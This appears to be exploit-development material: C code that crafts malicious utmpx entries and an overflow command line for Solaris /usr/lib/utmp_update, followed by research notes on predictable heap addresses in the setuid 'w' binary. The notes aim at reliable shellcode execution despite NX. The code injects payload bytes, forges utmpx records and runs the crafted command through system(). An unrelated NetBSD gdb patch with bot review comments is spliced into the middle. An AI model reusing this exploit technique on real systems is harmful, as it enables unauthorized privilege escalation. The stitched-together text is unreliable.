  static char phrase6[] = "\" \"9000\" \"8\" \"10\" \"1\" \"100000\" \"10000\" \"4\" \"aa\" \"4\" \"bazz\"";

  bzero(utmp_update_buf, 2048);
  p = utmp_update_buf;

  strcpy(p, phrase1); // space included ;) 
  p += strlen(phrase1);
  strcpy(p, LD_COOL_ADDR_STR);
  p += strlen(LD_COOL_ADDR_STR);
  strcpy(p, phrase3);
  p += strlen(phrase3);
  strcpy(p, phrase4);
  p += strlen(phrase4);

  // ttyn comes from ttyname(0) and is pasted into a shell command unquoted-checked
  strcpy(p, ttyn);
  p += strlen(ttyn);

  strcpy(p, phrase6);

///usr/lib/utmp_update `perl -e 'print "\xff\xff\xff\xf8" . "AAAA" . "\xff\x3e\xe2\x48" . "AAAA" . "\xff\xff\xff\xff" . "AAAA" . "AAAA" . "AAAA" '` `perl -e 'print "\xff\xbe\xef\x08" '` "pts////////2" "9000" "8" "10" "1" "100000" "10000" "4" "aa" "4" "bazz"
  // I could be all pretty RIGHT HERE, and have a TREE data structure.
  // But I'm going to be RAW and not have it. 
  /*strcpy (p, "\xff\xff\xff\xf8XXXX");
  p+= 8;

  *(p++) = LD_COOL_ADDR_STR[0];
  *(p++) = LD_COOL_ADDR_STR[1];
  *(p++) = LD_COOL_ADDR_STR[2];
  *(p++) = LD_COOL_ADDR_STR[3];
  //strcpy(p, LD_COOL_ADDR);
  //p+= strlen(LD_COOL_ADDR); 
  //int *intp = (uint32_t *) p;
  //*intp = LD_COOL_ADDR;
  //p+=4;                 
  strcpy(p, "XXXX\xff\xff\xff\xff");
  p+=8;*/
  // This stack ADDR needs to be dynamically asserted
  /* there needs to be a stack_return_addr variable
  and a check in the table for an available address
  don't forget tell the table it's now taken, after verifying by
  searching thru the UTMPX entries (just keep 2 copies until we get NULL,
  then look in the last copy for a signature) */
  /**(p++) = ' ';
  // ID
  strcpy(p, STACK_RETURN_ADDR);
  p+=4;
  //
  *(p++) = ' ';
  strcpy(p, pts);
  p+=strlen(pts);
  //*(p++) = *ttyn;
  strcpy (p, ttyn);
  p += strlen(ttyn);
  *(p++) = ' ';
   
  //"9000" 
  strcpy (p, "9000 8 10 1 100000 10000 4 aa 4 bazz");*/

  return utmp_update_buf;
}

// Somewhere above we will get the ID field
/*
 * Record one utmpx ut_id value as "in use" in one of the two global bitmaps.
 *
 * id: pointer to the 4 ID bytes (init_table() passes p->ut_id).
 *
 * - First byte below UPPER_LIMIT: bytes 0..2 index table[][][] directly and
 *   byte 3 is split into a byte index (/8) and a bit (%8).
 * - Otherwise the 4 bytes are read as one uint32_t. If that value lies in
 *   [TARGET_MIN, TARGET_MAX) and its offset from TARGET_MIN is a multiple
 *   of 4, the matching bit in stack_table is set. Everything else is ignored.
 *
 * Side effect: in the second case TARGET_MIN is subtracted through the
 * pointer, so the caller's buffer is modified in place.
 */
storeID(char *id)
{
  //char buf[5];
  uint8_t four,three,two,one;
  uint8_t bit_index=0;


  // ignore ID[0] if it's not in our range
  if ((uint8_t)*id > (UPPER_LIMIT-1) )
  {
    // UNLESS IT'S IN THE DESIRED STACK SPACE
    // how to add ID to the table
    uint32_t *awesome  = (uint32_t *)id;
    if (*awesome >= TARGET_MIN && *awesome < TARGET_MAX)
    {
      *awesome -= TARGET_MIN;
      if (*awesome % 4)
      {
        // not a multiple of 4: cannot be one of the tracked addresses, ignore it
        return;
      }
      else
      {
        // 32 address bytes per table element, one bit per 4-byte step
        uint32_t divider = *awesome / 32;
        uint8_t bit_shift = ((*awesome % 32) / 4);

        stack_table[divider] |= (1 << bit_shift);
        return;
      }
    }
    else return;
  }

  four = (uint8_t)*(id++);
  three = (uint8_t)*(id++);
  two = (uint8_t)*(id++);
  one = (uint8_t)*id / 8; 
  // despite the name, bit_index holds the mask here, not the bit number
  bit_index = 1 << ((uint8_t)*id % 8);

  table[four][three][two][one] |= bit_index;
}

//
// Function prototypes
add_pre_entry();
//
//
//

/* Manual test 1: print the string produced by build_argv_supplement() to stdout. */
test_argv()
{
  char *supplement = build_argv_supplement();

  printf ("%s", supplement);
}

uint8_t alarm_went_off=0;
/*
 * SIGALRM handler used as a progress ticker: sets alarm_went_off, prints a
 * dot to stderr, re-installs itself and re-arms a 1-second alarm.
 * p: the signal number passed by the system; unused.
 * NOTE(review): fprintf() is called from signal context.
 */
mysignal(int p)
{
  alarm_went_off=1;
  fprintf (stderr,".");
  signal(SIGALRM, mysignal);
  alarm(1);
}

/*
 * Point the utmpx routines at UTMPX_FILE and rewind, so the next
 * getutxent() starts from the first entry. The return value of
 * utmpxname() is not checked.
 */
reset_utmpx_file_for_querying()
{
  utmpxname(UTMPX_FILE);
  setutxent();
}

/*
 * Reset both ID bitmaps, then replay every entry currently in the utmpx
 * file through storeID() so IDs that already exist are marked as taken.
 * Closes the utmpx database when done.
 */
init_table()
{
  struct utmpx *entry;

  /* start from empty bitmaps */
  bzero (stack_table, STACK_TABLE_SIZE);
  bzero (table, UPPER_LIMIT*256*256*32);

  reset_utmpx_file_for_querying();
  for (entry = getutxent(); entry != NULL; entry = getutxent())
    storeID(entry->ut_id);

  endutxent();
}
/*
 * Manual test 2: dump every ID that is marked in the two bitmaps.
 *
 * First pass walks table[][][][] and prints each marked 4-byte ID, as text
 * when all four bytes are printable and as hex otherwise. Second pass walks
 * stack_table and prints each marked address. Indices start at 1 (bit 1 for
 * the very first byte) so that IDs containing a zero byte are skipped.
 *
 * A 1-second SIGALRM ticker (mysignal) prints dots to stderr while the scan
 * is running; the alarm is cancelled around each printf and re-armed after.
 * The bitmaps are expected to be filled already: the init_table() call here
 * is commented out.
 */
test_table()
{
  

  signal(SIGALRM, mysignal);


  //init_table();

  uint16_t four=1,three=1,two=1,one=1;
  uint8_t bit_index=1;
  static char pc[5];
  uint32_t *intp;
  int i;

  fprintf(stderr, "Searching the generic ID table");

  alarm(1);

  for (four=1; four < UPPER_LIMIT; four++)
  {
    for (three=1; three < 256; three++)
    {
      for (two=1; two < 256; two++)
      {
        bit_index=1;
        for (one=0; one  < 32; one++)
        {
          for (; bit_index < 8; bit_index++)
          {
            if (table[four][three][two][one] & (1 << bit_index))
            {
              alarm(0);
              // bit is set: this ID was recorded by storeID()
              pc[0] = four;
              pc[1] = three;
              pc[2] = two;
              pc[3] = (one * 8) + bit_index;
              pc[4] = 0;

              // finish the line of progress dots before printing a result
              if (alarm_went_off)
              {
                printf ("\n");
                alarm_went_off=0;
              }
              if ( (!isprint(pc[0])) || (!isprint(pc[1])) ||
                    (!isprint(pc[2])) || (!isprint(pc[3])) )
              {
                intp = (uint32_t *)&pc[0];
                printf ("ID: 0x%08x\n", *intp);
              }
              else printf ("ID: %s\n", pc);

              
              alarm(1);
            }
          }
          // I started with bit_index=1 to skip the NULL byte case
          bit_index=0;
          // when one=0
        }
      }
    }
  }

  fprintf (stderr, "Now testing stack table\n");
  fprintf (stderr, "ADDRESSES OCCUPIED:\n");
  alarm(1);
  for (i=0; i < STACK_TABLE_SIZE; i++)
  {
    for (bit_index=0; bit_index < 8; bit_index++)
    {
      if (stack_table[i] & (1 << bit_index))
      {
        alarm (0);

        if (alarm_went_off)
        {
          printf ("\n");
          alarm_went_off=0;
        }
        // same index-to-address mapping as getfree_stackreturnaddr_id()
        printf("0x%08x\n", TARGET_MIN + (i * 8 * 4) + (bit_index * 4) );
        alarm(1);
      }
    }
  }

}

/*
 * Manual test 3: build the utmp_update command line, echo it to stdout,
 * then run it with system() and report the exit status on stderr.
 * Unlike tests 1 and 2, this one executes the command and is not read-only.
 */
test_fake_tree_string_builder()
{
  char *p = string_builder_for_utmp_update_FAKE_TREE();
  printf( "%s",p);
  fprintf(stderr, "return code is %d\n", WEXITSTATUS(system(p)));
}


/*
 * Interactive test menu. Prints the four choices on stderr, reads a single
 * character from stdin and runs the matching test.
 *
 * Returns 1 when one of the tests '1'..'4' was selected, 0 for any other
 * input. Choice '4' crafts a record and writes it with pututxline().
 */
dotests()
{
  char choice;

  fprintf(stderr, "1) Test ARGV builder\n");
  fprintf(stderr, "2) Test TABLE ID Entries\n");
  fprintf(stderr, "3) Test string builder for utmp_update fake tree structure\n");
  fprintf(stderr, "4) Test Craft of Fake TREE UTMPX Entry\n");
  scanf("%c", &choice);

  switch (choice)
  {
    case '1':
      test_argv();
      return 1;

    case '2':
      test_table();
      return 1;

    case '3':
      test_fake_tree_string_builder();
      return 1;

    case '4':
    {
      struct utmpx entry;

      craft_fake_tree_utmpx_entry(&entry);
      /* read to the end of the database before writing the record */
      reset_utmpx_file_for_querying();
      while ( getutxent() != NULL )
        ;
      if ( pututxline(&entry) != NULL )
      {
        fprintf(stderr, "I think it was sucessful.. Do an 'od -X /var/adm/utmpx' \
        to find out");
      }
      return 1;
    }

    default:
      return 0;
  }
}

/*
 * Scan leading "-xyz" style arguments, one option letter at a time.
 *
 * Returns 1 as soon as the letter 't' is seen. Any other letter prints
 * "illegal option <c>" and stops the scan of further arguments (the rest
 * of the current argument is still examined). Returns 0 otherwise.
 *
 * The argv[] slot being scanned is advanced in place, as in the classic
 * K&R option loop, so the caller's array is modified.
 */
int processclargs(int argc, char *argv[])
{
  int opt;

  for (--argc, ++argv; argc > 0 && (*argv)[0] == '-'; --argc, ++argv)
  {
    /* step through the letters after the dash */
    while ((opt = *++*argv) != '\0')
    {
      if (opt == 't')
        return 1;

      printf("illegal option %c\n", opt);
      argc = 0;   /* ends the outer loop once this argument is finished */
    }
  }

  return 0;
}

 // need function protos
stat_utmpx();
align_utmpx();

size_t    gsizeof_utmpx_file;
int       entries;
uint32_t  TREE_base_addr;

/*
 * One-time setup: load the ID bitmaps from the current utmpx file and
 * derive the global ttyn from the terminal on file descriptor 0.
 *
 * ttyn ends up pointing just past the last '/' of the ttyname(0) result,
 * e.g. "2" for /dev/pts/2. The code assumes stdin is a terminal whose path
 * contains a '/'; neither ttyname() nor strrchr() is checked for NULL.
 */
necessary_init()
{
  char *last_slash;

  init_table();

  /* keep only what follows the final '/' of the tty path */
  last_slash = strrchr(ttyname(0), '/');
  ttyn = last_slash + 1;

  fprintf (stderr, "tty number is %s\n", ttyn);
}

/*
 * Entry point. Records the program name, runs necessary_init(), then either
 * shows the test menu (when processclargs() reports the -t option) and
 * returns its result, or goes on to align_utmpx().
 */
main(int argc, char **argv)
{
  prog = argv[0];

  necessary_init();

  if (processclargs(argc, argv) != 0)
    return dotests();

  align_utmpx();
}


// should do a faster routine during actual "fork parent watch for utmpx access"
/*
 * stat() the utmpx file and derive its entry count.
 *
 * statbuf: receives the stat() result.
 * Side effects: updates the globals utmpx_last_access_time (from st_atime)
 * and entries (st_size divided by the on-disk record size, struct futmpx);
 * prints the size figures on stderr. Exits with status 1 if stat() fails.
 *
 * Returns entries * sizeof(struct utmpx), i.e. the size the same number of
 * records occupies as in-memory struct utmpx, not the file size itself.
 */
int stat_utmpx(struct stat *statbuf)
{
  int rc = stat(UTMPX_FILE, statbuf);

  if (rc == ERR) {
    (void) fprintf(stderr, "%s: stat error of %s: %s\n",
      prog, UTMPX_FILE, strerror(errno));
    exit(1);
  }

  /* st_atime has one-second resolution */
  utmpx_last_access_time = statbuf->st_atime;

  fprintf (stderr, "statbuf.st_size = %d\n", statbuf->st_size);
  fprintf (stderr, "sizeof struct futmpx = 0x%x\n", sizeof(struct futmpx));

  entries = statbuf->st_size / sizeof (struct futmpx);
  fprintf (stderr, "NumEntries = 0x%x\n", entries);

  return sizeof (struct utmpx) * entries;
}

// this would be for heap-based execution method
//int smart_build_prefix=0;
/*
 * Computes TREE_base_addr as the value returned by stat_utmpx() plus
 * W_HEAPBUF_BASEADDR and requires it to be a multiple of 8.
 *
 * A remainder of 4 is handled by calling add_pre_entry() and re-running
 * stat_utmpx(); any other non-zero remainder prints a message and exits
 * with status 9.  Afterwards the string returned by
 * string_builder_for_utmp_update_FAKE_TREE() is run through system().
 *
 * Declared without a return type (implicit int) and returns no value.
 * The size and alignment checks are assert()s, so they disappear when the
 * file is built with NDEBUG.
 */
align_utmpx()
{
  int tmp;
  /* The W_HEAPBUF_BASEADDR +gsizeof_utmpx_file will be the base address of the TREE structure
  It MUST be 8-byte aligned 
  if it's not aligned, we simply add a pre-entry to get on TRACK.
  */
  gsizeof_utmpx_file = stat_utmpx(&gstatbuf);
  TREE_base_addr = gsizeof_utmpx_file + W_HEAPBUF_BASEADDR;
  if ( (tmp = TREE_base_addr % 8))
  {
    if (tmp == 4)
    {
      int newsize=0;
      // FOR STACK BASED EXECUTION WE WANT IT == 0, but for HEAP-BASED EXECUTION, we
      // want it at 4...
      //smart_build_prefix=4;

      
      fprintf (stderr, "Adding pre-entry for 8-byte alignment\n");
      add_pre_entry();

      // VERIFYING ENTRY SIZE
      // stat_utmpx() also refreshes the globals `entries` and
      // utmpx_last_access_time as a side effect.
      newsize = stat_utmpx(&gstatbuf);
      assert ( (newsize == (gsizeof_utmpx_file + UTMPX_ENTRY_SIZE)) && !(newsize % 8) );
      TREE_base_addr = newsize;
    }
    // NOTE ON HEAP_BASED_EXECUTION with smart alignment: 
    // Well, in this case, only have 32-4 bytes to work with in ut_name[]
    // I will need some sort of index_variable which will SMART_BUILD the entry
    //
    // Later do some sort of namelen(32) - smart_build_prefix = room to work with
    /**/
    else
    {
      // any remainder other than 0 or 4 is treated as fatal
      fprintf(stderr, "WTF?!?!?!");
      exit(9);
    }
  }

  // NOW update the TREE_base_addr to reflect new entry
  fprintf (stderr, "TREE_base_addr = 0x%x\n", TREE_base_addr);
  assert (!(TREE_base_addr % 8));

  // ADD FAKE TREE STRUCT ENTRY
  // The return value of system() is not checked.
  system(string_builder_for_utmp_update_FAKE_TREE());
}


// Because in my case the ID is the TARGET address :\ 
// make sure, don't waste a pre-entry on valuable TARGET SPACE
/* Returns 1 when *addr lies within [TARGET_MIN, TARGET_MAX], otherwise 0. */
int is_addr_in_target_space(uint32_t *addr)
{
  uint32_t value = *addr;

  return (value >= TARGET_MIN && value <= TARGET_MAX) ? 1 : 0;
}

// everything starts at 1 cause I'm not fucking with null bytes
/*
 * Walks the four-dimensional `table` bitmap and, for the first slot that
 * passes both tests below, writes four bytes to p[0..3], sets the slot's
 * bit in `table` and returns.  If no slot passes, p is left untouched.
 *
 * p must point to at least four writable bytes.  Declared without a return
 * type (implicit int); no value is returned on any path.
 */
find_free_id_not_stack(char *p)
{
  uint16_t four=1,three=1,two=1,one=1;
  uint8_t bit_index=1;

  // the three outer indexes start at 1, so p[0..2] are never written as 0
  for (four=1; four < UPPER_LIMIT; four++)
  {
    for (three=1; three < 256; three++)
    {
      for (two=1; two < 256; two++)
      {
        bit_index=1;
        // 32 table bytes of 8 bits each give the 256 values of the last byte
        for (one=0; one  < 32; one++)
        {
          for (; bit_index < 8; bit_index++)
          {
            // NOTE(review): `==` binds tighter than `&` in C, so this is
            // parsed as  table[...] & ((1 << bit_index) == 0)  -- confirm
            // that this is the test that was meant.
            if (table[four][three][two][one] & (1 << bit_index) == 0)
            {

              // found a freebie
              p[0] = four;
              p[1] = three;
              p[2] = two;
              p[3] = (one * 8) + bit_index;
              // NOTE(review): reads p through a uint32_t pointer; p's
              // alignment is whatever the caller passed -- verify this is
              // safe on a strict-alignment CPU.
              uint32_t *addr = (uint32_t *)p;
              if (!is_addr_in_target_space(addr)) // address pass intentional
              {
                table[four][three][two][one] |= (1 << bit_index);
                return;
              }
            }
          }
          // I started with bit_index=1 to skip the NULL byte case
          bit_index=0;
          // when one=0, but after that (one > 0) the bit_index @ 0 will reflect 
          // values beyond 0 so it's OK
        }
      }
    }
  }
}


/* Placeholder: the body is empty and neither name nor id is used.
 * Declared without a return type (implicit int); returns no value. */
add_utmpx_entry(char *name, char *id)
{

}

/* Placeholder: the body is empty.  Called from add_pre_entry().
 * Declared without a return type (implicit int); returns no value. */
add_generic_utmpx_entry()
{

}

/*
 * Asks find_free_id_not_stack() to fill a zeroed 5-byte buffer and then
 * calls add_generic_utmpx_entry().  The buffer is local and is not passed
 * on to the second call.
 */
add_pre_entry()
{
  char id[5] = { 0 };   /* four id bytes plus a terminating NUL */

  /* the lookup is expected to avoid ids inside our stack_space */
  find_free_id_not_stack(id);

  /* that function will wrap around something more powerful */
  add_generic_utmpx_entry();
}

Analysis Utilities — Pt. 13

Yes, the TREE structure in the TREE UTMPX entry must start on a WORD-aligned boundary: an 8-byte aligned address in a 32-bit process, a 16-byte aligned address in a 64-bit process.

To understand the 32/64 TREE structure in raw form:

bazz@blade72[pts/3][/tmp] cat malloc.c
#include <stdlib.h>
#include <memory.h>
#include <thread.h>
#include <synch.h>

/* WORDSIZE is the size of the WORD union defined below. */
#define WORDSIZE        (sizeof (WORD))
/* ALIGN is 16 when _LP64 is defined and 8 otherwise. */
#ifdef _LP64
#define ALIGN           16
#else
#define ALIGN           8
#endif

/* the proto-word; size must be ALIGN bytes */
typedef union _w_ {
        size_t          w_i;            /* an unsigned int */
        struct _t_      *w_p;           /* a pointer */
        char            w_a[ALIGN];     /* to force size: the union is at least ALIGN bytes */
} WORD;

/*
 * Prints sizeof(WORD) and ALIGN, then dumps a WORD byte by byte twice:
 * once with w_i set to 1 and once with w_i set to -1.  The dump shows how
 * many of the union's bytes w_i occupies and where its low-order byte sits.
 *
 * NOTE(review): WORDSIZE and w.w_i are size_t values passed to %x / %d,
 * and printf is used without <stdio.h>; the runs recorded below still
 * print the values one would expect.
 */
main()
{
  printf ("sizeof WORD = 0x%x\n", WORDSIZE);
  printf ("ALIGN is %d\n", ALIGN);

  WORD w;
  w.w_i = 1;
  printf ("w = %d\n", w.w_i);
  /* view the union as raw bytes */
  unsigned char *c = (char *)&w;
  int i;

  for (i=0; i < WORDSIZE; i++)
  {
    printf ("w[%d] = 0x%1x \n", i, *(c++));
  }
  printf ("\n");

  /* -1 converts to the all-ones size_t, marking every byte w_i covers */
   w.w_i = -1;
  printf ("w = %d\n", w.w_i);
  c = (char *)&w;

  for (i=0; i < WORDSIZE; i++)
  {
    printf ("w[%d] = 0x%1x\n", i, *(c++));
  }
  printf ("\n");
}
bazz@blade72[pts/3][/tmp] gcc malloc.c && ./a.out
sizeof WORD = 0x8
ALIGN is 8
w = 1
w[0] = 0x0
w[1] = 0x0
w[2] = 0x0
w[3] = 0x1
w[4] = 0x0
w[5] = 0x0
w[6] = 0x0
w[7] = 0x0

w = -1
w[0] = 0xff
w[1] = 0xff
w[2] = 0xff
w[3] = 0xff
w[4] = 0x0
w[5] = 0x0
w[6] = 0x0
w[7] = 0x0

bazz@blade72[pts/3][/tmp] gcc -m64 malloc.c && ./a.out
sizeof WORD = 0x10
ALIGN is 16
w = 1
w[0] = 0x0
w[1] = 0x0
w[2] = 0x0
w[3] = 0x0
w[4] = 0x0
w[5] = 0x0
w[6] = 0x0
w[7] = 0x1
w[8] = 0x0
w[9] = 0x0
w[10] = 0x0
w[11] = 0x0
w[12] = 0x0
w[13] = 0x0
w[14] = 0x0
w[15] = 0x0

w = -1
w[0] = 0xff
w[1] = 0xff
w[2] = 0xff
w[3] = 0xff
w[4] = 0xff
w[5] = 0xff
w[6] = 0xff
w[7] = 0xff
w[8] = 0x0
w[9] = 0x0
w[10] = 0x0
w[11] = 0x0
w[12] = 0x0
w[13] = 0x0
w[14] = 0x0
w[15] = 0x0
bazz@blade72[pts/3][/tmp] cat malloc.c
#include <stdlib.h>
#include <memory.h>
#include <thread.h>
#include <synch.h>

/* WORDSIZE is the size of the WORD union defined below. */
#define WORDSIZE        (sizeof (WORD))
/* ALIGN is 16 when _LP64 is defined and 8 otherwise. */
#ifdef _LP64
#define ALIGN           16
#else
#define ALIGN           8
#endif

/* the proto-word; size must be ALIGN bytes */
typedef union _w_ {
        size_t          w_i;            /* an unsigned int */
        struct _t_      *w_p;           /* a pointer */
        char            w_a[ALIGN];     /* to force size: the union is at least ALIGN bytes */
} WORD;

/* Reduced version of the test: prints only sizeof(WORD) and ALIGN.
 * NOTE(review): WORDSIZE is a size_t passed to %x. */
main()
{
  printf ("sizeof WORD = 0x%x\n", WORDSIZE);
  printf ("ALIGN is %d\n", ALIGN);
}
bazz@blade72[pts/3][/tmp] gcc malloc.c && ./a.out
sizeof WORD = 0x8
ALIGN is 8
bazz@blade72[pts/3][/tmp] gcc -m64 malloc.c && ./a.out
sizeof WORD = 0x10
ALIGN is 16
bazz@blade72[pts/3][/tmp]

Demonstrated: ALIGN differs between a 32-bit and a 64-bit executable. ALIGN is used in the malloc implementation.

Check to see whether strncpy copies the data that follows a null byte into the destination. It doesn't :(

bazz@blade72[pts/3][/tmp] cat strncpy.c
#include <string.h>

/*
 * Copies a buffer that has four marker bytes after an embedded NUL with
 * strncpy() and dumps the destination, to see whether the bytes after the
 * NUL are carried over.  strncpy() stops reading the source at the first
 * NUL and fills the rest of the requested length with NULs.
 */
main()
{
  char buf[32] = "LALALA\x00\xde\xad\xbe\xef";
  char buf2[32];

  /* writes buf2[0..29] only */
  strncpy(buf2, buf, 30);

  int i;
  /* NOTE(review): buf2[30] and buf2[31] are never written, so the last two
   * lines of the dump show uninitialized stack bytes. */
  for (i=0; i<32; i++)
  {
    printf ("buf2[%d] = 0x%1x\n", i, buf2[i]);
 }
}
bazz@blade72[pts/3][/tmp] gcc strncpy.c && ./a.out
buf2[0] = 0x4c
buf2[1] = 0x41
buf2[2] = 0x4c
buf2[3] = 0x41
buf2[4] = 0x4c
buf2[5] = 0x41
buf2[6] = 0x0
buf2[7] = 0x0
buf2[8] = 0x0
buf2[9] = 0x0
buf2[10] = 0x0
buf2[11] = 0x0
buf2[12] = 0x0
buf2[13] = 0x0
buf2[14] = 0x0
buf2[15] = 0x0
buf2[16] = 0x0
buf2[17] = 0x0
buf2[18] = 0x0
buf2[19] = 0x0
buf2[20] = 0x0
buf2[21] = 0x0
buf2[22] = 0x0
buf2[23] = 0x0
buf2[24] = 0x0
buf2[25] = 0x0
buf2[26] = 0x0
buf2[27] = 0x0
buf2[28] = 0x0
buf2[29] = 0x0
buf2[30] = 0x0
buf2[31] = 0x0
bazz@blade72[pts/3][/tmp]

3 Things today — Pt. 12

1 thing: Compiling 64-bit GDB
2 : Analyzing how the heap could be brute-forced in this exploit.
3: Discovering that the address returned by malloc is consistent across runs, on different machines!! With different UTMPX file sizes!! AWESOME!! The stack doesn’t have to be brute-forced!!! I will over-write the LD linker thing to point to the UTMPX-Shellcode which is located in the heap offsetted by the recorded malloc return address entry and blam!! We are singing!! <3 3-2) in summary, if you have read access to the executable it can be copied and debugged to find the base malloc offset to aid in one-timing a heap-based overflow on a NX stack-based executable/OS. If the exe is not readable, but there is an executable stack, you're still in luck! And can execute directly into a giant NOP sled... Even if the exe is not readable, it can always become readable by installing an identical copy of the OS in your lab.. :) Another thing I double checked, ulab, blade72, blade60 all have the same exact copy of /usr/bin/sparcv7/w I expect the 64-bit version to be the same as well.. Solaris 10 doesn't seem to have the 32-bit W... Solaris 10 patch:

$NetBSD: patch-ob,v 1.1 2008/01/06 19:25:10 rillig Exp $

gcc4 complained:
gdbtypes.c:2961: error: invalid lvalue in increment

--- include/obstack.h.orig	2001-01-21 00:02:00.000000000 +0000
+++ include/obstack.h	2007-11-30 21:04:44.000000000 +0000
@@ -421,7 +421,7 @@ __extension__								\
 ({ struct obstack *__o = (OBSTACK);					\
    if (__o->next_free + sizeof (void *) > __o->chunk_limit)		\
      _obstack_newchunk (__o, sizeof (void *));				\
-   *((void **)__o->next_free)++ = ((void *)datum);			\
+   *((*(void ***)&(__o->next_free)))++ = ((void *)datum);		\
    (void) 0; })
 
 # define obstack_int_grow(OBSTACK,datum)				\
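Review bot: The replacement on the `+` line still stores through a pointer of a different type than the object it names: it takes the address of `__o->next_free`, reinterprets that object as a `void **`, and post-increments it. gcc4 accepts that, but `next_free` looks like a byte pointer (the bounds check two lines up adds `sizeof (void *)` to it directly), so the increment relies on type punning. Storing first and advancing second needs no cast on the lvalue: `*(void **)__o->next_free = (void *)datum;` followed by `__o->next_free += sizeof (void *);`. The second hunk (obstack_int_grow) has the same shape with `int`, and the macro this body belongs to starts above the hunk.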
@@ -429,7 +429,7 @@ __extension__								\
 ({ struct obstack *__o = (OBSTACK);					\
    if (__o->next_free + sizeof (int) > __o->chunk_limit)		\
      _obstack_newchunk (__o, sizeof (int));				\
-   *((int *)__o->next_free)++ = ((int)datum);				\
+   *((*(int **)&(__o->next_free)))++ = ((int)datum);			\
    (void) 0; })
 
 # define obstack_ptr_grow_fast(h,aptr) (*((void **) (h)->next_free)++ = (void *)aptr)
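Review bot: The last context line shows `obstack_ptr_grow_fast` still using the cast-as-lvalue increment, `*((void **) (h)->next_free)++`, that this patch removes from the two macros above, so any use of it would presumably hit the same gcc4 "invalid lvalue in increment" error. If the build expands this macro it needs the same treatment, for example `(*(void **)(h)->next_free = (void *)(aptr), (h)->next_free += sizeof (void *))`. The line is context only, so whether a later part of the patch covers it cannot be seen from here.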

1. Let’s compile GDB 5.3 (same as 32bit present on blade72) without intl errors:
export CC="gcc -m64"
./configure --prefix=/home/bazz/tools --with-included-gettext --disable-nls
# on my Solaris 10 box:
ln -s /opt/csw/bin/gar /opt/csw/bin/ar

3: Analysis of Heap address space in 64-bit version vs. 32 bit.. and across machines…

64:

Mapped address spaces:

          Start Addr           End Addr       Size     Offset   Flags
         0x100000000        0x100003fff     0x4000          0 ----r-x
         0x100102000        0x100103fff     0x2000     0x2000 ----rwx
         0x100104000        0x10011bfff    0x18000          0 --b-rwx
  0xffffffff7ef00000 0xffffffff7ef01fff     0x2000          0 ----rwx
  0xffffffff7f000000 0xffffffff7f003fff     0x4000          0 ----r-x
  0xffffffff7f100000 0xffffffff7f101fff     0x2000          0 ----rwx
  0xffffffff7f200000 0xffffffff7f2b5fff    0xb6000          0 ----r-x
  0xffffffff7f3b6000 0xffffffff7f3c3fff     0xe000    0xb6000 ----rwx
  0xffffffff7f3c4000 0xffffffff7f3c5fff     0x2000          0 ----rwx
  0xffffffff7f500000 0xffffffff7f501fff     0x2000          0 ----rwx
  0xffffffff7f600000 0xffffffff7f62dfff    0x2e000          0 ----r-x
  0xffffffff7f72e000 0xffffffff7f731fff     0x4000    0x2e000 ----rwx
  0xffffffff7fffc000 0xffffffff7fffffff     0x4000 0xffffe000 -s--rw-

(gdb) p/x $o0
$1 = 0x100115c00
(gdb)

$o0 is malloc return pointer in heap space..

32

(gdb) p/x $o0
$4 = 0x30770
(gdb) info proc map
process 14893 flags:
PR_STOPPED Process (LWP) is stopped
PR_ISTOP Stopped on an event of interest
PR_RLC Run-on-last-close is in effect
PR_FAULTED : Incurred a traced hardware fault FLTBPT: Breakpoint trap

Mapped address spaces:

        Start Addr   End Addr       Size     Offset   Flags
           0x10000    0x13fff     0x4000          0 ----r-x
           0x22000    0x23fff     0x2000     0x2000 ----rwx
           0x24000    0x33fff    0x10000          0 --b-rwx
        0xff280000 0xff32bfff    0xac000          0 ----r-x
        0xff33c000 0xff343fff     0x8000    0xac000 ----rwx
        0xff370000 0xff371fff     0x2000          0 ----rwx
        0xff380000 0xff383fff     0x4000          0 ----r-x
        0xff390000 0xff391fff     0x2000          0 ----rwx
        0xff3b0000 0xff3dffff    0x30000          0 ----r-x
        0xff3e0000 0xff3e1fff     0x2000    0x30000 ----rwx
        0xff3e2000 0xff3e3fff     0x2000          0 ----rwx
        0xffbee000 0xffbeffff     0x2000          0 -s--rwx

(gdb)

I found that on 64 bit address, the offset returned by malloc from heap_start is 0x11C00.
Whereas on 32 bit, it was 0xC770.. No correlation there, I don’t think..

BUT MOST IMPORTANTLY — will that offset ALWAYS be MAINTAINED???
If so, we can reliably predict where in the heap our SHELLCODE UTMPX ENTRY resides :D

I just tested on Blade72 vs. Blade71. Although they are very similar machines, they both start up the heap at the same spot!! <3 Ulab also does its heap at teh same spot.. So does blade60.. 0x30770 Of course, I am debugging these binaries without the SUID bit set.. I copied them into my home directory.. I wonder if the thing would stay the same with it set??? I also note that the Sparcv7 binary of W has it's stack space NX by default! regardless of system setting?? The 64bit malloc base address is the same on blade72 and ulab as well.. 0x100115c00 Geeze :D -- with this ability to debug the program being consistent across to the SUID execution (will be checked on LIFE).. then that means holy cow!! <3 We can have an NX heap-based execution of shellcode that is 100% reliable :D


Being Awesome Pt. 11

No this is really a comparison of Stack space between Solaris 10 and Solaris 8.. at least the machines in question..

Solaris 10 box:
without one-million argV[1]:
0xffbfe000 0xffbfffff 0x2000 0 -s--rwx
with it:
0xffb0a000 0xffbfffff 0xf6000 0 -s--rwx

Solaris 8 box:
Without:
0xffbee000 0xffbeffff 0x2000 0 -s--rwx
With:
0xffaf8000 0xffbeffff 0xf8000 0xffffe000 -s--rwx

Actually what happens is:
TOP OF STACK
———–
init stuffz??
HUGE
FUCKING
STRING
ARGV[1]
Program stuffz..
————-
So it’s actually better to shoot near the top of stack ish lower.
something like 0xffbee008

But how does argv[1] get mapped?? Beats me.. I think I can just go with the flow on this one.. and the shellcode NOP sled will be right where it should..

(gdb) r
Starting program: /home/bazz/blade72/w_32
(no debugging symbols found)
warning: Temporarily disabling breakpoints for unloaded shared library "/usr/lib/ld.so.1"
(no debugging symbols found)
(no debugging symbols found)

Breakpoint 1, 0x00010ec8 in main ()
(gdb) info proc map
process 2222 flags:
PR_STOPPED Process (LWP) is stopped
PR_ISTOP Stopped on an event of interest
PR_RLC Run-on-last-close is in effect
PR_MSACCT Microstate accounting enabled
PR_PCOMPAT Micro-state accounting inherited on fork
PR_FAULTED : Incurred a traced hardware fault FLTBPT: Breakpoint trap

Mapped address spaces:

        Start Addr   End Addr       Size     Offset   Flags
           0x10000    0x13fff     0x4000          0 ----r-x
           0x22000    0x23fff     0x2000     0x2000 ----rwx
           0x24000    0x2ffff     0xc000          0 --b-rwx
        0xff280000 0xff357fff    0xd8000          0 ----r-x
        0xff368000 0xff36ffff     0x8000    0xd8000 ----rwx
